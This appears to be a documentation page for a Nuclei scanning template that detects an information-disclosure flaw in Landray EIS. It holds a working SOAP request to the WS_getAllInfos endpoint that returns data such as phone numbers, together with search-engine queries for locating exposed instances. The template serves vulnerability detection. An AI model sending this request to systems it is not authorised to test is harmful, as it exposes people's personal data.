Landray EIS WS_getAllInfos - Information Disclosure
ID: landray-eis-ws-infoleak
Severity: high
Author: Fur1na
Tags: landray,eis,info-leak
Description
Section titled “Description”Landray EIS WS_getAllInfos interface suffers from a sensitive information disclosure vulnerability.
YAML Source
Section titled “YAML Source”id: landray-eis-ws-infoleak
info: name: Landray EIS WS_getAllInfos - Information Disclosure author: Fur1na severity: high description: | Landray EIS WS_getAllInfos interface suffers from a sensitive information disclosure vulnerability. reference: - https://mp.weixin.qq.com/s/CTLyriSSF-nQ8SUFv4RX0A - https://github.com/akyosk/pocman/blob/main/cve/Lanling/Lanling_Info.py metadata: verified: true max-request: 1 fofa-query: app="Landray-EIS智慧协同平台" zoomeye-query: app="蓝凌EIS智慧协同平台" tags: landray,eis,info-leak
http: - raw: - | POST /WS/Basic/Basic.asmx HTTP/1.1 Content-Type: text/xml Host: {{Hostname}}
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/"> <soapenv:Header/> <soapenv:Body> <tem:WS_getAllInfos/> </soapenv:Body> </soapenv:Envelope>
matchers-condition: and matchers: - type: word part: body words: - "<?xml" - "WS_getAllInfosResponse" - "CELL_PHONE_NUMBER" - "UNID" condition: and
- type: word part: header words: - "Content-Type: text/xml"
- type: status status: - 200# digest: 490a0046304402207d03361de777d46c3bcf1fc5f98bc7c6e52101d59d527202c058925221187c88022047340147064eca85686cd40ad9d8d9e982e344d74a28c0495b626008fce5eb67:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/landray/landray-eis-ws-infoleak.yaml"